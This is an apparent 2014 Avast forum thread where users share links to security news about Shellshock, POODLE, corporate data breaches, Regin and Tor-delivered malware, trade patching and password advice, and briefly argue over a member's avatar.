It may not help what's happened but a free one year watch to help prevent Identity theft is available. (https://homedepot.allclearid.com/)
(An excerpt from Security Is Everyones Business (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing) )
-
Watch your browser's address bar to prevent TABjacking
Interesting article
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
and this one includes a test in a "Try it Out" section.
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
(that demo worked on a tablet, but not on PC because of NoScript in the browser)
URL in the address bar will definitely show whether you're really entering your credentials (into, for example, gmail, your bank, here), or not, so never stop watching it as you traverse open tabs.
-
Ask.com: Different Name, Same Old Dirty Tricks (http://www.davescomputertips.com/ask-com-different-name-same-old-dirty-tricks/?utm_source=wysija&utm_medium=email&utm_campaign=Weekly+Recap+Newsletter)
A nice new "useful" tool:
(http://www.davescomputertips.com/wp-content/uploads/2014/08/utility-chest-1.png)
Useless is a better way to describe it but, people will certainly fall for this crap.
-
Useless is a better way to describe it but, people will certainly fall for this crap.
How I hate Ask.com >:(
-
May have been posted before......
Mac security packages range from peachy to rancid – antivirus tests
http://www.theregister.co.uk/2014/09/04/mac_anti_virus_test/
AV-Comparatives Mac test
http://www.av-comparatives.org/mac-security-reviews/
-
May have been posted before......
Mac security packages range from peachy to rancid – antivirus tests
http://www.theregister.co.uk/2014/09/04/mac_anti_virus_test/
AV-Comparatives Mac test
http://www.av-comparatives.org/mac-security-reviews/
https://forum.avast.com/index.php?topic=147567.msg1122271#msg1122271 (https://forum.avast.com/index.php?topic=147567.msg1122271#msg1122271) :)
-
Website Security – Compromised Website Used To Hack Home Router
http://blog.sucuri.net/2014/09/website-security-compromised-website-used-to-hack-home-routers.html
-
Hi Lisandro,
Some do agree with you here in this discussion: https://www.mywot.com/en/forum/9900-ask-com-toolbar-is-adware
Bad ethics, riskware, junkware, adware, trackware and being sneaked in by some big players like Oracle. 8)
polonus
-
Sadly just added to my newest presentation "Security Is Everyones Business" (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409748047991-5217.png)
Ex-Employees Say Home Depot Left Data Vulnerable
http://www.nytimes.com/2014/09/20/business/ex-employees-say-home-depot-left-data-vulnerable.html
-
DuckDuckGo now blocked in China: http://thenextweb.com/asia/2014/09/22/duckduckno/
Re: https://en.greatfire.org/duckduckgo.com
pol
-
Good we can be watched unhindered: https://en.greatfire.org/https/forum.avast.com/index.php%3Ftopic%3D52252.msg1126623
No censorship detected
polonus
-
Large malvertising campaign under way involving DoubleClick and Zedo
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
-
The big apps-developer security fail: http://www.aspectsecurity.com/the-2014-state-of-developer-application-security-knowledge-report-landing-page?&__hssc=&__hstc&hsCtaTracking=83cedd39-6b74-4b5b-a840-bebc18bb4a63%7C8e3027fb-d244-45b5-9c3c-5e5233d7bb1e
pol
-
One issue: Secure Object Implementations
These security expressions should be taught to developers, see:
http://docs.spring.io/spring-security/site/docs/3.0.x/reference/el-access.html
polonus
-
Another data breach at eBay!
http://www.toptechnews.com/article/index.php?story_id=112003I4NJEO
-
Experts warn Bash bug poses “catastrophic” threat to devices in the home
http://www.news.com.au/technology/experts-warn-bash-bug-poses-catastrophic-threat-to-devices-in-the-home/story-e6frfrnr-1227070183296
-
In-App Browsers Considered Harmful
http://furbo.org/2014/09/24/in-app-browsers-considered-harmful/
-
Experts warn Bash bug poses “catastrophic” threat to devices in the home
http://www.news.com.au/technology/experts-warn-bash-bug-poses-catastrophic-threat-to-devices-in-the-home/story-e6frfrnr-1227070183296 (http://www.news.com.au/technology/experts-warn-bash-bug-poses-catastrophic-threat-to-devices-in-the-home/story-e6frfrnr-1227070183296)
Is avast! vulnerable to this attack.
Actually, are we vulnerable to the attack because avast uses the bash shell ?
-
Most draconian anti-terror law to come to Australia: http://www.smh.com.au/digital-life/consumer-security/terror-laws-clear-senate-enabling-entire-australian-web-to-be-monitored-and-whistleblowers-to-be-jailed-20140925-10m8ih.html
polonus
-
Most draconian anti-terror law to come to Australia: http://www.smh.com.au/digital-life/consumer-security/terror-laws-clear-senate-enabling-entire-australian-web-to-be-monitored-and-whistleblowers-to-be-jailed-20140925-10m8ih.html
polonus
Whistle blowers should be rewarded. Not jailed. IMHO :)
-
Patch Bash NOW: 'Shell Shock' bug blasts OS X, Linux systems wide open
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
-
The Internet on yellow alert considering the Bash-bug situation: https://isc.sans.edu/diary/Why+We+Have+Moved+to+InfoCon%3AYellow/18715
polonus
-
Perl CORE - Deep Recursion Stack Overflow
https://www.lsexperts.de/security-advisory/items/schwachstelle-perl-core.html
-
Just one by me personally this time. I was startled to find the actual status of insecure web server header policy settings for the majority of websites on the Internet. The majority of website admins and website security staff must have been fast asleep when they were taught these matters in school. Or could it be that this protocol was largely ignored by educators? :o
To get an idea what I mean go here to see this site's epic fail in this respect: https://forum.avast.com/index.php?topic=155715.0
polonus
-
Cyberattack Against JPMorgan Chase Affects 76 Million Households
http://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/
http://www.nytimes.com/interactive/2014/10/03/business/dealbook/jpmorgan-documents.html
-
VMware product updates address critical Bash security vulnerabilities
http://www.vmware.com/security/advisories/VMSA-2014-0010.html
-
Bugzilla Zero-Day Exposes Zero-Day Bugs
http://krebsonsecurity.com/2014/10/bugzilla-zero-day-exposes-zero-day-bugs/ (http://krebsonsecurity.com/2014/10/bugzilla-zero-day-exposes-zero-day-bugs/)
-
Huge Data Leak at Largest U.S. Bond Insurer
http://krebsonsecurity.com/2014/10/huge-data-leak-at-largest-u-s-bond-insurer/ (http://krebsonsecurity.com/2014/10/huge-data-leak-at-largest-u-s-bond-insurer/)
-
Beijing police arrests 30.000 cybercrime suspects: http://www.icrosschina.com/news/2014/1009/4280.shtml
I have not seen SEO SPAM numbers going down because of these efforts ;D
polonus
-
Microsoft Security Bulletin Advance Notification for October 2014
https://technet.microsoft.com/library/security/ms14-oct
-
Google Chrome users under attack from long phishing uri's: http://news.netcraft.com/archives/2014/10/09/phishing-with-data-uris.html
I am protected by the Netcraft extension in Google Chrome,
polonus
-
Dairy Queen - Data Security Incident
http://www.dq.com/us-en/datasecurityincident/
Kmart Investigating Payment System Breach
http://www.kmart.com/en_us/dap/statement1010140.html
-
Ummm...
It seems the https/:: has broken. Sunday 12 October 2014 @16:42 WAST. My K-Meleon74 raised the alarm with the red URL bar, but couldn't tell me what was wrong, Opera 12.01 doesn't have the glaring colours, but does have the Security Info pop-down...
See the attachments.
Gordon.
-
AT&T breach exposes Social Security Numbers.
http://www.ibtimes.com/att-breach-exposes-social-security-drivers-license-numbers-1700410
-
DropBox Hacked.
If you're using it, change your password NOW.
-
DropBox Hacked.
If you're using it, change your password NOW.
If you have 2nd factor authentication and use a unique password... Well... I'll pass...
-
Breaking news: SSLv3 protocol holed.
Scary vulnerability to be revealed soon!
News on this is soon to come out, read:
https://twitter.com/briankrebs/status/522127738153750528
Brian Krebs as always, well informed.
More here: http://seclists.org/oss-sec/2014/q4/318
polonus
There was already something found wrong with java's implementation of DHE cipher suites: roughly 0.5% of SSL handshakes for DHE cipher suites fail.
Updatee - Now we know it is called Poodle. a serious security hole, read: https://www.imperialviolet.org/2014/10/14/poodle.html
D
-
Hi Lisandro,
Well the bottom has fallen out under dropbox :D for quite some users, so I pass, no dropbox for me.
polonus
-
DropBox Hacked.
If you're using it, change your password NOW.
-> https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/
-
DropBox Hacked.
If you're using it, change your password NOW.
-> https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/ (https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/)
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Technically, they are right the passwords were compromised through a third party app.
End result still has the same effect. The advice still stands. Change your password.
For help on doing this, follow these simple instructions:
http://youtu.be/gDCv4xPeoVI (http://youtu.be/gDCv4xPeoVI)
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
We already sold London bridge to the USA - they though they were buying Tower bridge ;D
-
I can sell you the Brooklyn Bridge at a very reasonable price. :)
Deal. ;D
We already sold London bridge to the USA - they though they were buying Tower bridge ;D
I saw it in Lake Havasu City, AZ. :)
(http://upload.wikimedia.org/wikipedia/commons/thumb/f/f8/London_Bridge%2C_Lake_Havasu_City%2C_Arizona_%283227888290%29.jpg/220px-London_Bridge%2C_Lake_Havasu_City%2C_Arizona_%283227888290%29.jpg)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1413501206054-33072.png)
Gmail does a fairly good job at weeding out Spam and suspicious emails.
Nothing else to add except be careful!
-
DropBox Hacked.
If you're using it, change your password NOW.
Er... Just had a Cap'n Cook at https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/.
Please--and it's not just you Bob--if we're gonna post warnings, can we have some evidence? We all know how frustrating False Alarms are on our AV apps >:(
OTOH, it always pays to have backups of your Cloud Storage, and certainly I only use DropBox for sharing purposes.
Gordon.
-
DropBox Hacked.
If you're using it, change your password NOW.
Er... Just had a Cap'n Cook at https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/ (https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/).
Please--and it's not just you Bob--if we're gonna post warnings, can we have some evidence? We all know how frustrating False Alarms are on our AV apps >:(
OTOH, it always pays to have backups of your Cloud Storage, and certainly I only use DropBox for sharing purposes.
Gordon.
@Gordon,
Technically speaking, Dropbox's servers did not get breached.
Photos and login credentials apparently leaked from third-party sites or apps that piggyback on these services.
The end result, if you used any of these 3rd party apps, still put you at risk.
The recommended procedure was to change your password and use two-step verification.
IMHO, it's always safer to go the extra step to make sure you're safe. :)
-
Photos and login credentials apparently leaked from third-party sites or apps that piggyback on these services.
The end result, if you used any of these 3rd party apps, still put you at risk.
Which is why very few (if any) of my passwords are shared between "services", and I never "Sign on from xxx". It's just not worth the risk. I'm trying to remember the security expert who had all his Apple i-stuff raped by (I think) Anonymous: he had everything linked. He couldn't even phone up from his iPhone, as his "Secret Questions" had been reset! IIRC, Amazon was involved at some stage, and had a lot of explaining to do. BUT: this fellow was the chief culprit, for linking everything.
A-a-a-n-d, I have CryptoPrevent to save me from CryptoLocker & clones 8) Reminder to self: upgrade every 1st-of-the-month!!!!!!
...and use two-step verification
I had a look at the recommendations, but how kludgy! The biggest problem is time. It's going to take some minutes to get the SMS from DropBox, while you've got the log-in screen open and ditto but much longer for the email. I've often waited up to 30 minutes for some "activation" emails to get back to me... My bank gave us this little gizmo that flashes up a number or something and gives you 36 seconds to get it into the form field with your log-on. So the time factor is eliminated. And--of course--it's a different number each time.
Gordon.
-
Hi gotdon451,
Goes to show that we haven't arrived at a "secure" secure "IntheCloud' service.
Too many parties involved to keep it secure and big Pebkas issues,
which maybe are the worst of the pack.
I don't want that on my back all the time.
polonus
-
Vulnerability in Microsoft OLE Could Allow Remote Code Execution
https://technet.microsoft.com/library/security/3010060
https://support.microsoft.com/kb/3010060
-
Tor-node detected that adds malcode to downloads. Non-SSL downloads and lack of download certification puts us at risk.
Read: http://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries/ blog article author = JOSH PITTS
pol
-
ATP28: a window into russia`s cyber espionage operations
doc.pdf http://www.fireeye.com/resources/pdfs/apt28.pdf
-
Hackers breach some White House computers
http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html (http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html)
-
Hackers breach some White House computers
http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html (http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html)
Who spies on who(m) ???
Answer = Everyone spies on everyone else.
That way, no one has any secrets from the other Country. :)
It's called an equal opportunity hackers society.
-
Drupal Core - Highly Critical - Public Service announcement - PSA-2014-003
https://www.drupal.org/PSA-2014-003
-
Shellshock-related-atatcks: http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-related-attacks-continue-targets-smtp-servers/
pol
-
Unpatched Drupal Sites Vulnerable to SQL Injection Attacks: https://www.drupal.org/node/2357241
polonus
-
R7-2014-15: GNU Wget FTP Symlink Arbitrary Filesystem Access
https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access
-
Probably posted somewhere however I've always found this interesting!
http://www.bbc.com/news/uk-29891285 (http://www.bbc.com/news/uk-29891285)
-
Swedish hacker finds 'serious' vulnerability in OS X Yosemite
http://www.macworld.com/article/2841965/swedish-hacker-finds-serious-vulnerability-in-os-x-yosemite.html
-
9.000 Dutch PC's infested with Rovnix-2: http://labs.bitdefender.com/2014/11/tracking-rovnix-2/
Re: http://totalhash.com/analysis/bac0cceeacfe2b91b05a961621f5cdd9323f0163
Infection comes via earlier Upatre infections that install Rovnix-bootkit and also "CryptoLock" ransomware and/or Necurs Trojan.
So watch out for ZIP-Malcode folks.
Earlier rovnix variants: http://winsec.se/?m=201405&paged=4
polonus
-
Interesting read! Thanks Pol. :)
-
Survey Says!
http://securitywatch.pcmag.com/hacking/329237-survey-shows-many-home-networks-are-insecure
-
American worst connected cities marching on into the digital divide - many households without any internet connection.
Read here for the whole list of 176 worst connected cities:
http://redistributingthefuture.blogspot.nl/2014/11/americas-worst-connected-big-cities.html
polonus
-
Home Depot discloses 53 million customer email addresses stolen!
https://blog.avast.com/2014/11/07/home-depot-discloses-that-53-million-customer-email-addresses-were-stolen/
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
-
Postal Service Discloses Major Theft of Its Employees’ Personal Data
http://www.nytimes.com/2014/11/11/us/postal-service-discloses-major-data-theft.html
http://about.usps.com/news/fact-sheets/scenario/media-statement-final.pdf
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
If you have EMET 5.0 installed it breaks IE11, uninstalling EMET cures this
-
Hacked servers turned against their own datacenter.
Canadian datacenter OVH attacked via the notorious Shell Shock Bash-hole.
that seriosuly meant "pain" for the super-hoster .
800 servers were involved in the attack!
See how they went offline: http://status.ovh.net/?do=details&id=8120
polonus
-
EMET 5.1 download here: http://www.microsoft.com/en-us/download/details.aspx?id=43714
polonus
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
If you have EMET 5.0 installed it breaks IE11, uninstalling EMET cures this
Updating to EMET 5.1 (see Damian's link) before running MSU should help.
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/ (http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/)
This again points out the importance of updating your OS and programs as soon as the updates are available.
Under normal circumstances, the sooner you update, the sooner you'll again be secure and protected against the
latest discovered vulnerabilities.
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/
"Virtually All"... So I assume this means, Windows 7/8/8.1/10 and maybe Vista?
Well, lots of updates for us too do! Thanks for the info Pondus!
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html (http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html)
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html (http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html)
i wonder if NSA / CIA / KGB / Mossad / ............ knew about it ???.....they are probably laughing now
-
80% of all Americans fear Government internet surveillance!
http://news.softpedia.com/news/80-Percent-of-Americans-Fear-Online-Government-Surveillance-464881.shtml
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html (http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html)
i wonder if NSA / CIA / KGB / Mossad / ............ knew about it ???.....they are probably laughing now
Likely. 19 years is a long time for a vulnerability to not be well known by everyone in IT security, not to mention the hackers. :'(
-
Worldwide Antivirus Vendor Market Share
https://www.opswat.com/about/media/reports/antivirus-october-2014
-
Worldwide Antivirus Vendor Market Share
https://www.opswat.com/about/media/reports/antivirus-october-2014 (https://www.opswat.com/about/media/reports/antivirus-october-2014)
Caution when looking at these statistics. Windows Defender is turned on by default
in all Windows 8 computers. These stats don't give a true picture since installing a third party
turns off Defender but doesn't remove it from the list.
It's nice to see that Avast is listed as the most used third party AV.
-
Trojan horse being spread via malicious Tor-exit-nodes as a wrapper: http://www.f-secure.com/weblog/archives/00002764.html
Source: FSLabs.
polonus
-
Trojan horse being spread via malicious Tor-exit-nodes as a wrapper: http://www.f-secure.com/weblog/archives/00002764.html
Source: FSLabs.
polonus
Trojan-Dropper:W32/OnionDuke.A
https://www.virustotal.com/en/file/19972cc87c7653aff9620461ce459b996b1f9b030d7c8031df0c8265b73f670d/analysis/
Backdoor:W32/OnionDuke.A
https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/
Backdoor:W32/OnionDuke.B
https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/
-
Hi Pondus,
Thank you for this additional scan info. Als read this: http://sensorstechforum.com/onionduke-malware-used-in-apt-attacks-through-the-tor-network/ Link article author = BertaB+
polonus
-
Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)
https://technet.microsoft.com/en-us/library/security/MS14-068
-
Fake Windows 10 Activators Spreading All Over the Web
http://news.softpedia.com/news/Fake-Windows-10-Activators-Spreading-All-Over-the-Web-465227.shtml
-
Backdoor found in thousands and thousands illegal CMS-plug-ins and themes.
Read: http://blog.fox-it.com/2014/11/18/cryptophp-analysis-of-a-hidden-threat-inside-popular-content-management-systems/
We cannot determine the exact number of affected websites but we estimate that, at least a few thousand websites are compromised by CryptoPHP.
polonus
-
Malware now infecting users from popular website
http://blogs.norman.com/2014/for-consumption/malware-now-infecting-users-from-popular-website
-
Thank you Pondus for your heads-up on this. I hope everybody is convinced now they cannot be completely safe without a decent adblocker installed like ABP.
polonus
-
If you belong to the Malwarebytes Forum (Many of us do!) you should be aware of the following:
"bob3160,
I'm writing to let you know that on November 10th a vulnerability in our
forum software allowed a hacker to gain access to the server hosting our
community. We have no evidence of any personal data being stolen (nor do
we store any on our forums!) but as a precautionary measure we are
forcing all users to reset their passwords. The next time you attempt to
log in, please select the "Forgot Your Password?" link below and follow the steps.
https://forums.malwarebytes.org/index.php?app=core&module=global§ion=lostpass (https://forums.malwarebytes.org/index.php?app=core&module=global§ion=lostpass)
We've also migrated our community away from our servers and onto aservice hosted by Invision Power Board. They know their software bestand as vulnerabilities are discovered, they can patch them more quickly.I personally apologize for the inconvenience and if you have anyquestions, do not hesitate to contact me directly at
mkleczynski at malwarebytes.org.
Marcin"
-
If you belong to the Malwarebytes Forum (Many of us do!) you should be aware of the following:
"bob3160,
I'm writing to let you know that on November 10th a vulnerability in our
forum software allowed a hacker to gain access to the server hosting our
community. We have no evidence of any personal data being stolen (nor do
we store any on our forums!) but as a precautionary measure we are
forcing all users to reset their passwords. The next time you attempt to
log in, please select the "Forgot Your Password?" link below and follow the steps.
https://forums.malwarebytes.org/index.php?app=core&module=global§ion=lostpass (https://forums.malwarebytes.org/index.php?app=core&module=global§ion=lostpass)
We've also migrated our community away from our servers and onto aservice hosted by Invision Power Board. They know their software bestand as vulnerabilities are discovered, they can patch them more quickly.I personally apologize for the inconvenience and if you have anyquestions, do not hesitate to contact me directly at
mkleczynski at malwarebytes.org.
Marcin"
https://forums.malwarebytes.org/index.php?/topic/161236-malwarebytesorg-comprimised/
see post from RubbeR DuckY
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
polonus
-
Russian hackers hijack webcams worldwide!
http://ottawacitizen.com/technology/internet/russian-hackers-hijack-webcams-worldwide-including-at-least-four-in-ottawa
-
Hi all,
sorry if this the wrong place to put my ?
Having a small prob with Windows update KB3011780, it says it failed to d/load and now i have to switch of my comp manually.
I presume this update has something to do with it???. not being a tech wiz i have no idea.
I read in another forum that Avast might have something to do with it,, any ideas?? >:(
-
Having a small prob with Windows update KB3011780, it says it failed to d/load and now i have to switch of my comp manually.
I presume this update has something to do with it???. not being a tech wiz i have no idea.
I read in another forum that Avast might have something to do with it,, any ideas?? >:(
-> https://forum.avast.com/index.php?topic=160717.0
-
Security Advisory – High severity – WP-Statistics WordPress Plugin
http://blog.sucuri.net/2014/11/security-advisory-high-severity-wp-statistics-wordpress-plugin.html
-
Cigarettes with malware
http://news.softpedia.com/news/Chinese-Electronic-Cigarettes-Have-Malware-Planted-In-the-Charger-465664.shtml
(And they wonder why many people don't use WPS Office Free)
-
Look out for these Top Telemarketer Area Codes.
Aside from the popularly used toll-free number exchanges (800, 866, 877, 888, 855), the top spam area codes are:
1. 313 – Detroit
2. 713 – Houston
3. 954 – Fort Lauderdale
4. 404 – Atlanta
5. 484 – Eastern and Southeastern Pennsylvania
6. 407 – Orlando
7. 214 – Dallas
8. 202 – Washington, D.C.
9. 972 – Dallas
10. 205 – Birmingham
-
Regin: Top-tier espionage tool enables stealthy surveillance
http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
-
F-Secure
The Regin Espionage Toolkit https://www.f-secure.com/weblog/archives/00002766.html
-
16% of British adults hit by cyber attacks!
http://www.welivesecurity.com/2014/11/24/16-british-adults-hit-cyber-attacks/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+eset%2Fblog+%28ESET+Blog%3A+We+Live+Security%29
-
The following was posted in Avast Free/Pro/Suite yesterday, but no responses, yet. Perhaps this is a more appropriate topic to get the opinion of those concerned about security.
I was wondering if the issue mentioned here has been seen and addressed :
http://it.toolbox.com/blogs/securitymonkey/bypassing-email-av-is-ridiculously-easy-64458
If you go to the link, the implication for avast users seems to be that the mail shield has a potential gap.
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
UPDATE: The tool „Detekt“: what you should know about it
https://blog.gdatasoftware.com/blog/article/update-the-tool-detekt-what-you-should-know-about-it.html
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences been of clicking on polonus's link. I do appreciated the the clicking on the link and the the pop-up may have been purely co-incidental but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences been of clicking on polonus's link. I do appreciated the the clicking on the link and the the pop-up may have been purely co-incidental but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
vital info is missing ..... what does the popup say?
-
Sorry pondus, it all happened so fast that I didn't really take it all in. I dont even know whether it was avast or mbam. However, since my computer survived the first visit to your link, I will click on polonus's again and see what happens :)
-
Second click on polonus's link and no pop-up appeared What might have caused it to appear the first time?
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences been of clicking on polonus's link. I do appreciated the the clicking on the link and the the pop-up may have been purely co-incidental but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
vital info is missing ..... what does the popup say?
What I've highlighted in red is roughly what the pop-up said pondus
-
Second click on polonus's link and no pop-up appeared What might have caused it to appear the first time?
well the popup would have all the info of what was bloked .... file / url .... so without that info impossible to say
if you have not rebooted since the popup, right click avast tray icon .... select show last popup
-
The last pop-up was something about Christmas :(
-
DroidJack RAT: A tale of how budding entrepreneurism can turn to cybercrime
http://www.symantec.com/connect/blogs/droidjack-rat-tale-how-budding-entrepreneurism-can-turn-cybercrime (http://www.symantec.com/connect/blogs/droidjack-rat-tale-how-budding-entrepreneurism-can-turn-cybercrime)
-
Hacker Collective Anonymous promises to take down Missouri Government and Banks
http://news.softpedia.com/news/Hacker-Collective-Anonymous-Promises-to-Take-Down-Missouri-Government-and-Bank-Sites-465978.shtml
-
Detekt Tool detects spyware that general av does not detect:
http://www.amnesty.org/en/news/new-tool-spy-victims-detect-government-surveillance-2014-11-20
Do some av turn a blind eye on official government spyware? Read here: http://www.theregister.co.uk/2013/11/05/av_response_state_snooping_challenge/
polonus
-
Websites with security seals are not a priori more secure than sites without such a seal:
https://vagosec.org/2014/11/clubbing-seals/
This scanner seal is even questionable in the eyes of WOT web rep: http://www.scanverify.com/vulnerability_scanner_free/vulnerability_scanner_free.php
-> https://www.mywot.com/en/scorecard/scanverify.com?utm_source=addon&utm_content=rw-viewsc
polonus
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
UPDATE: The tool „Detekt“: what you should know about it
https://blog.gdatasoftware.com/blog/article/update-the-tool-detekt-what-you-should-know-about-it.html
What Detekt was really all about
https://medium.com/@botherder/what-detekt-was-really-all-about-aaecfb17b6d5
-
APT detection is easily circumvented by BAB0 malware:
https://blog.mrg-effitas.com/new-anti-apt-tools-are-no-silver-bullets-an-independent-test-of-apt-attack-detection-appliances/
polonus
-
Using Password Managers is like committing cyber security suicide.
Read: http://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/
Specific KeePass, Password Safe and neXus Personal Security Client executable are being monitored by the malware,
just as easily as if you'd post-fixed the general password to your screen...
polonus
-
Syrian hackers subvert Ad networks!
http://www.databreachtoday.com/syrian-hackers-subvert-ad-network-a-7621
-
Exclusive: FBI warns of 'destructive' malware in wake of Sony attack
http://www.reuters.com/article/2014/12/02/us-sony-cybersecurity-malware-idUSKCN0JF3FE20141202 (http://www.reuters.com/article/2014/12/02/us-sony-cybersecurity-malware-idUSKCN0JF3FE20141202)
-
Sony to officially name North Korea as source of hacking.
http://recode.net/2014/12/03/sony-to-officially-name-north-korea-as-source-of-hack-attack/
Possibly due to the Sony produced movie "The Interview".
-
Sony to officially name North Korea as source of hacking.
http://recode.net/2014/12/03/sony-to-officially-name-north-korea-as-source-of-hack-attack/ (http://recode.net/2014/12/03/sony-to-officially-name-north-korea-as-source-of-hack-attack/)
Possibly due to the Sony produced movie "The Interview".
It's always nice to know who did the hacking. Knowing who unfortunately doesn't change the fact that the hack occurred nor
does it change the fact that the "private" information has been exposed.
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
They have been saying captcha is a thing of the past for some time - yet here it still is.
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/ (http://www.wired.com/2014/12/google-one-click-recaptcha/)
They have been saying captcha is a thing of the past for some time - yet here it still is.
I'm sure some of the new users on this forum would hope the use of the captcha would end. :)
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/ (http://www.wired.com/2014/12/google-one-click-recaptcha/)
They have been saying captcha is a thing of the past for some time - yet here it still is.
I'm sure some of the new users on this forum would hope the use of the captcha would end. :)
Yep, that is the pain of captcha, for it to be worth using it has to be difficult.
-
Hmmmm... do you think this might have something to do with googles latest "hummingbird" technology, which analyses your searches and uses algorythms and synonyms to present you with better and more relevant ads!...
A little bit orwelian if you ask me... just wanted to know what the experts think of it and whether the point i made ties in.
xxx
PEri
-
Thank you for changing your Avatar.
This forum is accessed by youngsters.
Thanks. :)
-
Thats odd because ive been using it whilst speaking to Essex boy and Pondus who have not had a problem with it..
Do you not take your children/grand children to the beach?
Do you not allow art in your house?
I suggest you avert your eyes.. in the politest way possible
Infact i am really insulted that you have felt the need to point this out to me!... it makes no difference but i am a mother and i find that your inference is extremely insulting ... and i have not accessed the childrens area and posted in there... i do hope this is a case of over sensitivity on your part
-
The avatar could be construed as offensive as could the "personal message".
Both should be changed asap.
-
You were asked politely, not only is your avatar close to the knuckle your response to a polite request - but your response is insulting as as you suggest the polite request was.
